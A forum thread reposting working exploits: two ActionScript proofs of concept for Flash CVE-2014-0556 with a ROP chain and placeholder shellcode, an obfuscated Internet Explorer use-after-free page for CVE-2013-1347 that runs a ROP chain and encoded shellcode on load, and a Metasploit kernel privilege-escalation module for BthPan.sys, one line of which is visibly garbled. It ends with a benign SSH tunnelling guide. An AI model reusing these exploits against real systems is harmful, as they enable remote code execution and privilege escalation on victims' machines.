eax=0908a008 ebx=02ffa6a0 ecx=0b51f020 edx=4141411c esi=06a62020 edi=06a62020
eip=4141411c esp=02ffa5e4 ebp=02ffa610 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
4141411c ??              ???
*/

package {
    import flash.events.*
    import flash.media.*
    import flash.display.*
    import flash.geom.*
    import flash.utils.*
    import flash.text.*
    import flash.system.Capabilities;
    import flash.external.ExternalInterface

    public class Main extends Sprite {
        private var i0:uint
        private var i1:uint
        private var i2:uint
        private var i3:uint
        private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & " + Capabilities.version)
        private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200)
        private var ob:Vector.<Object> = new Vector.<Object>(6400)
        private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff)
        private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4)
        private var snd:Sound
        private var vector:uint

        public function Main():void {
            for (i0 = 0; i0 < 3200; i0++) {
                ba[i0] = new ByteArray()
                ba[i0].length = 0x2000
                ba[i0].position = 0xfffff000
            }
            for (i0 = 0; i0 < 3200; i0++) {
                if (i0 % 2 == 0) ba[i0] = null
                ob[i0 * 2] = new Vector.<uint>(1008)
                ob[i0 * 2 + 1] = new Vector.<uint>(1008)
            }
            bitmap.copyPixelsToByteArray(rect, ba[1601])
            for (i0 = 0; ; i0++) if (ob[i0].length != 1008) break
            ob[i0][1024 * 3 - 2] = 0xffffffff
            for (i1 = 0; ; i1++) {
                if (i0 == i1) continue
                if (ob[i1].length != 1008) break
            }
            ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff
            ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1]
            ob[i0].fixed = true
            for (i2 = 1000; ; i2++) {
                if ( ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15] ) {
                    vector = ob[i1][0xFFFFFFFF - i2 + 11]
                    str += "\n\nVector<uint> Address : " + vector.toString(16)
                    break
                } else if ( ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15] ) {
                    vector = ob[i1][i2 + 11]
                    str += "\n\nVector<uint> Address : " + vector.toString(16)
                    break
                }
            }
            snd = new Sound()
            for (i2 = 0; i2 < 6400; i2++) {
                if (i2 == i0 || i2 == i1) continue
                ob[i2] = null
                ob[i2] = new Vector.<Object>(1014)
                ob[i2][0] = snd
                ob[i2][1] = snd
            }
            for (i2 = 0; ; i2++) {
                if (ob[i0][i2 + 0] == 1014 && ob[i0][i2 + 1] == ob[i0][i2 + 2] && ob[i0][i2 + 3] == 1 ) {
                    str += "\n\nDump Vector<Object>"
                    for (i3 = 0; i3 < 20; i3++) {
                        if (i3 % 4 == 0) str += "\n"
                        str += zeroPad(ob[i0][i2 + i3 - 9].toString(16), 8) + "\t"
                    }
                    str += "\n\nDump Sound Object"
                    for (i3 = 0; i3 < 20; i3++) {
                        if (i3 % 4 == 0) str += "\n"
                        str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t"
                    }
                    str += "\n\nDump Sound Object V-Table"
                    for (i3 = 0; i3 < 20; i3++) {
                        if (i3 % 4 == 0) str += "\n"
                        str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t"
                    }
                    str += "\n\n*** V-Table Modify ***"
                    write(ob[i0][i2 + 1] - 1, vector + 8)
                    for (i3 = 0; i3 < 1008; i3++) {
                        ob[i0][i3] = 0x41414100 | i3
                    }
                    str += "\n\nDump Sound Object"
                    for (i3 = 0; i3 < 20; i3++) {
                        if (i3 % 4 == 0) str += "\n"
                        str += zeroPad(read(ob[i0][i2 + 1] - 1 + (4 * i3)).toString(16), 8) + "\t"
                    }
                    str += "\n\nDump Sound Object V-Table"
                    for (i3 = 0; i3 < 20; i3++) {
                        if (i3 % 4 == 0) str += "\n"
                        str += zeroPad(read(read(ob[i0][i2 + 1] - 1) + (4 * i3)).toString(16), 8) + "\t"
                    }
                    break
                }
            }
            ob[i1][0xFFFFFFFE - 1024 * 3] = 4096
            ob[i0][1024 * 3 - 2] = 0
            var tf:TextField = new TextField();
            tf.width = 800;
            tf.height = 800;
            tf.text = str;
            addChild(tf)
            if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit)
        }

        private function write(addr:uint, data:uint):void {
            ob[i0][(addr - vector) / 4 - 2] = data
        }

        private function read(addr:uint):uint {
            return ob[i0][(addr - vector) / 4 - 2]
        }

        private function zeroPad(number:String, width:int):String {
            if (number.length < width) return "0" + zeroPad(number, width-1)
            return number
        }

        public function exploit():void {
            snd.toString()
        }
    }
}

=============================================================================================================================

/*
<html>
<head>
<title>CVE-2014-0556</title>
</head>
<body>
<object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br>
<button onclick="swf.exploit()">STOP</button>
</body>
</html>
*/

/*
(1728.eb0): Break instruction exception - code 80000003 (first chance)
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d63048 cc              int     3
1:020> dd esp l4
08d63048  cccccccc cccccccc cccccccc cccccccc
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d63049 cc              int     3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d6304a cc              int     3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d6304b cc              int     3
1:020> t
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984
eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
08d6304c cc              int     3
*/

package {
    import flash.events.*
    import flash.media.*
    import flash.display.*
    import flash.geom.*
    import flash.utils.*
    import flash.text.*
    import flash.external.ExternalInterface

    public class Main extends Sprite {
        private var i0:uint
        private var i1:uint
        private var i2:uint
        private var i3:uint
        private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145")
        private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200)
        private var ob:Vector.<Object> = new Vector.<Object>(6400)
        private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff)
        private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4)
        private var snd:Sound
        private var vector:uint
        private var vtable:uint
        private var flash:uint

        public function Main():void {
            for (i0 = 0; i0 < 3200; i0++) {
                ba[i0] = new ByteArray()
                ba[i0].length = 0x2000
                ba[i0].position = 0xfffff000
            }
            for (i0 = 0; i0 < 3200; i0++) {
                if (i0 % 2 == 0) ba[i0] = null
                ob[i0 * 2] = new Vector.<uint>(1008)
                ob[i0 * 2 + 1] = new Vector.<uint>(1008)
            }
            bitmap.copyPixelsToByteArray(rect, ba[1601])
            for (i0 = 0; ; i0++) if (ob[i0].length != 1008) break
            ob[i0][1024 * 3 - 2] = 0xffffffff
            for (i1 = 0; ; i1++) {
                if (i0 == i1) continue
                if (ob[i1].length != 1008) break
            }
            ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff
            ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1]
            ob[i0].fixed = true
            for (i2 = 1000; ; i2++) {
                if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) {
                    vector = ob[i1][0xFFFFFFFF - i2 + 11]
                    break
                } else if (ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15]) {
                    vector = ob[i1][i2 + 11]
                    break
                }
            }
            snd = new Sound()
            for (i2 = 0; i2 < 6400; i2++) {
                if (i2 == i0 || i2 == i1) continue
ob[i2] = null ob[i2] = new Vector.<Object>(1014) ob[i2][0] = snd ob[i2][1] = snd } for (i2 = 0; ; i2++) { if (ob[i0][i2 + 0] == 1014 && ob[i0][i2 + 1] == ob[i0][i2 + 2] && ob[i0][i2 + 3] == 1 ) { vtable = read(ob[i0][i2 + 1] - 1) flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx write(ob[i0][i2 + 1] - 1, vector + 0xf54) for (i3 = 0; i3 < 1008; i3++) { ob[i0][i3] = 0x41414100 | i3 } ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN ob[i0][3] = 0x00000201 // 0x00000201 ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN ob[i0][5] = 0x00000040 // 0x00000040 ob[i0][6] = flash + 0x00691119 // POP ECX # RETN ob[i0][7] = vector + 2000 // Writable location ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP) ob[i0][10] = flash + 0x001bf342 // POP ESI # RETN ob[i0][11] = flash + 0x0000d83f // JMP [EAX] ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect() ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp' ob[i0][16] = 0xcccccccc // shellcode ob[i0][17] = 0xcccccccc // shellcode ob[i0][18] = 0xcccccccc // shellcode ob[i0][19] = 0xcccccccc // shellcode ob[i0][979] = flash + 0x0029913A // POP EAX # RETN ob[i0][980] = 0x00000f58 ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN break } } ob[i1][0xFFFFFFFE - 1024 * 3] = 4096 ob[i0][1024 * 3 - 2] = 0 str += flash.toString(16) var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf) if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit) } private function write(addr:uint, data:uint):void { ob[i0][(addr - vector) 
/ 4 - 2] = data } private function read(addr:uint):uint { return ob[i0][(addr - vector) / 4 - 2] } private function zeroPad(number:String, width:int):String { if (number.length < width) return "0" + zeroPad(number, width-1) return number } public function exploit():void { snd.toString() } } } [/LIST] Sursa: [ActionScript 3] CVE-2014-0556 - Pastebin.com
  18. MSIE Use After Free EXP/CVE-2013-1347
[URL="http://pastebin.com/JN2GiB8n#"]pastebin.com/JN2GiB8n[/URL]
[LIST=1]
<!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
<?IMPORT namespace="t" implementation="#default#time2">
</meta>
<script>
pRESSURA = eval('unescape');
fAHPARIC = CollectGarbage;
dISCESA = '%u';

function rIGUARDI(rEPLACEMENT) {
    return pRESSURA(dISCESA + rEPLACEMENT.substring(4, 8) + dISCESA + rEPLACEMENT.substring(0, 4));
}

function vILMENTE(tRIPARTITO) {
    rAPPACIATI = (tRIPARTITO >>> 24).toString((0x10));
    if (rAPPACIATI.length == 0x1) rAPPACIATI = "0" + rAPPACIATI;
    mOSTRARTI = ((tRIPARTITO >>> 16) & (0xff)).toString((0x10));
    if (mOSTRARTI.length == 0x1) mOSTRARTI = "0" + mOSTRARTI;
    tERRENE = ((tRIPARTITO >>> 8) & (0xff)).toString((0x10));
    if (tERRENE.length == 0x1) tERRENE = "0" + tERRENE;
    pRINCIPIO = (tRIPARTITO & (0xff)).toString((0x10));
    if (pRINCIPIO.length == 0x1) pRINCIPIO = "0" + pRINCIPIO;
    return rAPPACIATI + mOSTRARTI + tERRENE + pRINCIPIO;
}

function ue(dw) {
    return rIGUARDI(vILMENTE(dw));
}

function setc() {
    var Then = new Date()
    Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 3)
    document.cookie = "Cookie1=fucktheothers;expires=" + Then.toGMTString()
}

function readc() {
    var cookieString = new String(document.cookie);
    if (cookieString.indexOf("fucktheothers") == -1) {
        return 0
    } else {
        return 1;
    }
}

function DropPayload() {
    // en = 77c10000
    // kr = 77bc0000
    // offset = 50000
    var r = "";
    r+= ue( 0x77bd4cfa ); // # POP EBP # RETN [msvcrt.dll]
    r+= ue( 0x77bd4cfa ); // # skip 4 bytes [msvcrt.dll]
    r += ue( 0x77BFFA1C); // # POP EBX # RETN [msvcrt.dll]
    r += ue( 0xffffffff ); // # EBX 0xffffffff (inc 201)
    for(i=0;i<=0x201;i++) {
        r += ue( 0x7d710b7e ); // # INC EBX # RETN [shell32.dll]
    }
    r+= ue( 0x77be4de1 ); // # POP EAX # RETN [msvcrt.dll]
    r+= ue( 0x2cfe04a7 ); // # put delta into eax (-> put += 0x00000040 into edx)
    r+= ue( 0x77bfeb80 ); // # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
    r+=
ue( 0x77c08fbc ); // # XCHG EAX,EDX # RETN [msvcrt.dll] r+= ue( 0x77bde33f ); // # POP ECX # RETN [msvcrt.dll] r+= ue( 0x77c0e062 ); // # &Writable location [msvcrt.dll] r+= ue( 0x77bf6116 ); // # POP EDI # RETN [msvcrt.dll] r+= ue( 0x77bf7a42 ); // # RETN (ROP NOP) [msvcrt.dll] r+= ue( 0x77beb8ba ); // # POP ESI # RETN [msvcrt.dll] r+= ue( 0x77bdaacc ); // # JMP [EAX] [msvcrt.dll] r+= ue( 0x77beb860 ); // # POP EAX # RETN [msvcrt.dll] r+= ue( 0x77bc1120 ); // # ptr to &VirtualProtect() [IAT msvcrt.dll] r+= ue( 0x77d03ad9); // # PUSHAD # RETN [user32.dll] r+= ue( 0x77c01025 ); // # ptr to 'push esp # ret ' [msvcrt.dll] return r; } function align_esp() { var r= ""; r += ue(0x77BFD801); return r; } function xchg_esp() { var r=""; r += ue(0x77BC5ED5); return r; } function helloWorld() { if (readc()) return; setc(); unicorn = unescape("ABCD"); unicorn2 = unescape("EEEE"); for (i=0; i < 2; i++) { unicorn += unescape("ABCD"); }unicorn += unescape("AB"); unicorn += DropPayload(); unicorn += "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\uFFE8\uFFFF\uC2FF\u9158\u8390\u04C4\u498D\u4112\u3180\u8089\u9039\uF775\uDB62\u02BF\uB5FC\u02BF\uBCFD\u8AF1\uDF7C\u02B7\uA9FF\u7C8A\u40BA\uC8C0\uBA24\uBF52\u3786\uA19D\u5FB3\u81FD\u4248\u8A84\uC953\u6662\u56B2\u6EFC\uB7D7\uD702\u8AAD\uEF54\u02B7\uC285\u02B7\u95D7\u548A\u02B7\u028D\u4C8A\uFC4A\uE5FB\uE6E4\uA7E7\uE5ED\u89E5\u49BA\u8AED\uB9C9\u86F1\u02B7\u85C9\u02B7\u95F9\uB724\uC902\u6281\uB785\uC902\uB7BD\uC904\uB7F5\uC902\u1CB5\uBA36\u0343\u61D2\u7609\u7676\u6508\u8889\u8989\uE1DD\u8889\u8989\u5976\uB136\u25AB\u616E\u76E1\u7676\u52BA\u7D02\uDADD\uDFDA\u5976\u0736\u87C7\u6165\u76DD\u7676\u650A\uBF8D\uA50A\uECAD\u5976\uD91C\uBF36\uA693\u61F9\u76B7\u7676\u02D4\uBA7D\uDA52\uDFDA\u8961\u8989\uD689\u4E0A\uDEC3\u61DA\u8989\u8989\u0AD6\u864E\uDCDE\u6502\uC9C9\uC9C9\u76C9\u3669\u7711\u8703\u8461\u7676\u0276\uE37D\uDF89\u8961\u8989\uD689\u4E0A\uDE86\u02DC\uC965\uC9C9\uC9C9\u6976\uF736\u6B51\u61FA\u7763\u7676\u76DA\uE159\uFDFD\uB3F9\uA6A6\uA7B8\uBABB\uA7
BD\uB8B0\uBDA7\uA6BA\uECFA\uFAF1\uF1EC\uECA7\uECF1\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u8989\u1989\u1919\u1919\u1919\u1919"; animvalues = align_esp(); for (i=0; i < 0x70/4; i++) { if (i == 0x70/4-1) { animvalues += xchg_esp(); } else { animvalues += align_esp(); } } animvalues += unicorn; for(i = 0; i < 13; i++) { animvalues += ";red"; } f0 = document.createElement('span'); document.body.appendChild(f0); f1 = document.createElement('span'); document.body.appendChild(f1); f2 = document.createElement('span'); document.body.appendChild(f2); document.body.contentEditable="true"; f2.appendChild(document.createElement('datalist')); f1.appendChild(document.createElement('span')); f1.appendChild(document.createElement('table')); try{ f0.offsetParent=null; }catch(e) { }f2.innerHTML=""; f0.appendChild(document.createElement('hr')); f1.innerHTML=""; fAHPARIC(); try { a = document.getElementById('myanim'); a.values = animvalues; } catch(e) {} } </script> </head> <body onload="eval(helloWorld());"> <t:ANIMATECOLOR id="myanim"/> </body> </html> @PhysicalDrive0 [/LIST] Sursa: MSIE Use After Free EXP/CVE-2013-1347 - Pastebin.com
  19. [h=1]Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation[/h]

[CODE]
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/local/windows_kernel'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::File
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',
      'Description'    => %q{
        A vulnerability within Microsoft Bluetooth Personal Area Networking module,
        BthPan.sys, can allow an attacker to inject memory controlled by the attacker
        into an arbitrary location. This can be used by an attacker to overwrite
        HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
        NtQueryIntervalProfile.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
          'Jay Smith <jsmith[at]korelogic.com>'   # MSF module
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Targets'        =>
        [
          ['Windows XP SP3',
            {
              'HaliQuerySystemInfo' => 0x16bba,
              '_KPROCESS'           => "\x44",
              '_TOKEN'              => "\xc8",
              '_UPID'               => "\x84",
              '_APLINKS'            => "\x88"
            }
          ]
        ],
      'References'     =>
        [
          [ 'CVE', '2014-4971' ],
          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ],
          [ 'OSVDB', '109387' ]
        ],
      'DisclosureDate' => 'Jul 18 2014',
      'DefaultTarget'  => 0
    ))
  end

  def ring0_shellcode
    tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
    tokenswap << "\x8B\x40\x44\x50\xBB\x04"
    tokenswap << "\x00\x00\x00\x8B\x80\x88"
    tokenswap << "\x00\x00\x00\x2D\x88"
    tokenswap << "\x00\x00\x00\x39\x98\x84"
    tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8"
    tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
    tokenswap << [session.sys.process.getpid].pack('V')
    tokenswap << "\x8B\x80\x88\x00\x00\x00"
    tokenswap << "\x2D\x88\x00\x00\x00"
    tokenswap << "\x39\x98\x84\x00\x00\x00"
    tokenswap << "\x75\xED\x89\xB8\xC8"
    tokenswap << "\x00\x00\x00\x61\xC3"
  end

  def fill_memory(proc, address, length, content)
    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")

    unless proc.memory.writable?(address)
      vprint_error("Failed to allocate memory")
      return nil
    end
    vprint_good("#{address} is now writable")

    result = proc.memory.write(address, content)
    if result.nil?
      vprint_error("Failed to write contents to memory")
      return nil
    end
    vprint_good("Contents successfully written to 0x#{address.to_s(16)}")

    return address
  end

  def disclose_addresses(t)
    addresses = {}

    hal_dispatch_table = find_haldispatchtable
    return nil if hal_dispatch_table.nil?
    addresses['halDispatchTable'] = hal_dispatch_table
    vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}")

    vprint_status('Getting the hal.dll base address...')
    hal_info = find_sys_base('hal.dll')
    if hal_info.nil?
      vprint_error('Failed to disclose hal.dll base address')
      return nil
    end
    hal_base = hal_info[0]
    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}")

    hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
    addresses['HaliQuerySystemInfo'] = hali_query_system_information
    vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")

    addresses
  end

  def check
    if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Safe
    end

    os = sysinfo["OS"]
    return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i

    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    return Exploit::CheckCode::Safe unless handle

    session.railgun.kernel32.CloseHandle(handle)
    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
    end

    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    if handle.nil?
      fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device")
    end

    my_target = targets[0]

    print_status("Disclosing the HalDispatchTable address...")
    @addresses["halDispatchTable"] + 0x4, 0)
    session.railgun.kernel32.CloseHandle(handle)

    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
    session.railgun.ntdll.NtQueryIntervalProfile(2, 4)

    print_status("Checking privileges after exploitation...")
    unless is_system?
      fail_with(Failure::Unknown, "The privilege escalation wasn't successful")
    end
    print_good("Privilege escalation successful!")

    p = payload.encoded
    print_status("Injecting #{p.length} bytes to memory and executing it...")
    unless execute_shellcode(p)
      fail_with(Failure::Unknown, "Error while executing the payload")
    end
  end
end
[/CODE]

Source: http://www.exploit-db.com/exploits/34982/
  20. SSH tunnel

Contents
[LIST]
[*]1 simple port forwarding (SSH tunneling)
[*]1.1 port forwarding through an intermediary
[*]1.2 reverse port forwarding
[*]1.3 tricky reverse forwarding
[*]1.4 Using scp through a DMZ gateway to a machine behind a firewall using a tunnel
[*]2 Other options
[*]3 SOCKS5 with Firefox
[/LIST]

[h=2]simple port forwarding (SSH tunneling)[/h]

This example creates a tunnel for HTTP. This will forward port 80 of your localhost to port 80 of www.example.com.

[CODE]
ssh -f -N -q -L 80:localhost:80 username@www.example.com
[/CODE]

This example creates a tunnel for IMAP. Here we forward port 1143 on localhost to 143 (IMAP) on imap.example.com.

[CODE]
ssh -f -N -q -L 1143:localhost:143 username@imap.example.com
[/CODE]

[LIST]
[*]-f tells ssh to go into the background (daemonize).
[*]-N tells ssh that you don't want to run a remote command. That is, you only want to forward ports.
[*]-q tells ssh to be quiet.
[*]-L specifies the port forwarding.
[/LIST]

[h=2]port forwarding through an intermediary[/h]

You can have the remote machine forward ports to a third machine. This is useful where you have your local machine outside a firewall; a visible machine on the DMZ; and a third machine invisible to the outside.

This creates a tunnel from your localhost port 81 to 192.168.1.69 port 80 through dmz.example.com. This lets you see the web server from outside a LAN.

[CODE]
ssh -f -N -q -L 81:192.168.1.69:80 username@dmz.example.com
[/CODE]

This example creates a tunnel for SSH itself, over localhost port 2222.

[CODE]
ssh -f -N -q -L 2222:target-host.example.com:22 username@dmz.example.com
[/CODE]

This example creates a tunnel for IMAP. Here we forward port 1143 on localhost to 143 (IMAP) on 192.168.1.100 through dmz.example.com.

[CODE]
ssh -f -N -q -L 1143:192.168.1.100:143 username@dmz.example.com
[/CODE]

VNC Viewer uses port 5900. This shows a double-hop.

[CODE]
# localhost --> wan-gateway --> dmz-gateway --> vnc-console
ssh -L 5900:localhost:5900 root@wan-gateway.example.com ssh -L 5900:vnc-console.example.com:5900 root@dmz-gateway.example.com
[/CODE]

[h=2]reverse port forwarding[/h]

This is used in the following situation:
[LIST]
[*]You have a server inside a private LAN that you want to connect to from the WAN outside.
[*]You can't create a NAT and port forwarding on your firewall to map the machine to the outside.
[*]You have a server outside that you can connect to from the server inside the LAN.
[/LIST]

What this does is create a connection from the server in the LAN to the server outside. Once that connection is established the server outside starts listening on port 2222. All connections to port 2222 are sent back to port 22 of the server in the LAN. Now you can leave this connection running in your office; go home and ssh to your proxy server at port 2222 and you will be connecting to your server inside the LAN on port 22.

[CODE]
ssh -f -N -q -R 2222:localhost:22 my_name@remote.example.com
[/CODE]

[h=2]tricky reverse forwarding[/h]

This allows a server on an internal LAN to expose a service to the outside WAN. For example, I have a database server that will only accept connections from a specific development box. That dev box is inside the firewall. I want to connect to the database from outside the firewall.

[CODE]
ssh -t -L 5432:localhost:1999 my_name@firewall.example.com ssh -t db_server ssh -t -R 1999:127.0.0.1:5432 my_name@firewall
[/CODE]

[h=2]Using scp through a DMZ gateway to a machine behind a firewall using a tunnel[/h]

First you set up port forwarding through an intermediary. This forwards your localhost port 2222 to port 22 on 192.168.1.100. Remember that 192.168.1.100 is not on your local network; 192.168.1.100 is on the LAN network shared with 208.77.188.166.

[CODE]
ssh -f -N -q -L 2222:192.168.1.100:22 user@208.77.188.166
scp -P 2222 transformers.avi user@localhost:.
[/CODE]

A diagram might help. Remember, port 22 is the SSH server port on the 192.168.1.100 machine.

[CODE]
+---------------+      +----------------+      +----------------------+
| your          |      | remote DMZ     |      | server on remote LAN |
| local machine |      | server         |      | 192.168.1.100        |
|               |      | 208.77.188.166 |      |                      |
|         2222: >------>|               |------> :22                  |
|               |\______________/|      |      |                      |
|               |      |                |      |                      |
+---------------+      +----------------+      +----------------------+
[/CODE]

[h=2]Other options[/h]

[CODE]
-o ExitOnForwardFailure=yes \
-o GSSAPIAuthentication=no \
-o GSSAPIAuthentication=no \
-o HashKnownHosts=no \
-o KbdInteractiveAuthentication=no \
-o PermitLocalCommand=yes \
-o LocalCommand="logger connected to %h" \
-o LocalForward=00:remote.example.com:000 \
-o ExitOnForwardFailure=yes \
-o NoHostAuthenticationForLocalhost=yes \
-o ProxyCommand=foo \
-o RemoteForward=foo \
-o RequestTTY=yes \
-o SendEnv=LC_* \
-o Tunnel=ethernet \
-o TunnelDevice=any:any \
-o VerifyHostKeyDNS=yes
[/CODE]

[h=2]SOCKS5 with Firefox[/h]

Simple and secure web browsing. You can set up a tunnel as described above or you can use the following technique. This starts SSH on your localhost acting as a SOCKS proxy. Once you start SSH this way you can point any application that supports a SOCKS5 interface to this port. But these instructions will show what you need to do to get Firefox to proxy through SOCKS. Firefox supports SOCKS with no extra add-ons.

Start an ssh connection to a host that you want to proxy through. Use the -D option to specify a SOCKS5 port on your localhost. The port doesn't really matter. You just need to use the same port in your SOCKS client application.

[CODE]
ssh -D 9999 username@proxy.example.com
[/CODE]

In Firefox select "Edit | Preferences | Advanced Tab | Connection Settings button". Then select "Manual proxy configuration". All you need to fill out is "SOCKS Host: Localhost", "Port: 9999", then select "SOCKS v5". It's easy.

This tool can also help in switching the proxy settings on and off: SwitchProxy Tool

